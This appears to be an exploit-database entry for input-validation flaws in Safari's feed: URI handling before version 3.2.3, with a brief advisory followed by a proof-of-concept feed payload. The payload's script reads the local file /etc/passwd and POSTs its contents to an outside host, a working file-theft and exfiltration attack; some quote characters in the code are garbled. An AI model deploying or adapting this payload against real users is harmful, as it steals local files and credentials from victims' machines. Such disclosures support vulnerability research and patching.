Apple Safari 3.2.2 - feed: URI Multiple Input Validation Vulnerabilities

2009-05-12T00:00:00
ID EXPLOITPACK:37A7850BFD5F6832221AA4F1C6A686CB
Type exploitpack
Reporter Billy Rios
Modified 2009-05-12T00:00:00

Description

Apple Safari 3.2.2 - feed: URI Multiple Input Validation Vulnerabilities

                                        
                                            source: https://www.securityfocus.com/bid/34925/info

Apple Safari is prone to multiple input-validation vulnerabilities.

An attacker can exploit these issues by enticing an unsuspecting victim to visit a malicious website.

Successfully exploiting these issues will allow the attacker to execute arbitrary JavaScript code in the local security zone. This may allow the attacker to obtain sensitive information that can aid in further attacks; other consequences may also occur.

These issues affect versions prior to Safari 3.2.3. 

<summary>On the Cylon baseship, Cavil confronts the last member of the Final Five.
<script>
var contents;
var req;
req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
req.open(�GET�, �file:///etc/passwd�, true);
req.send(�);

function processReqChange() {
if (req.readyState == 4) {
contents = req.responseText;
sendit2XSSniper(contents);
}
}
function sendit2XSSniper(stuff){
var req2;
req2 = new XMLHttpRequest();
req2.open(�POST�, �http://www.example.com�, true);
req2.setRequestHeader(�Content-Type�,'application/x-www-form-urlencoded�);
req2.send(�filename=etcpasswd&filecontents=�+escape(stuff));
}
</script>
</summary>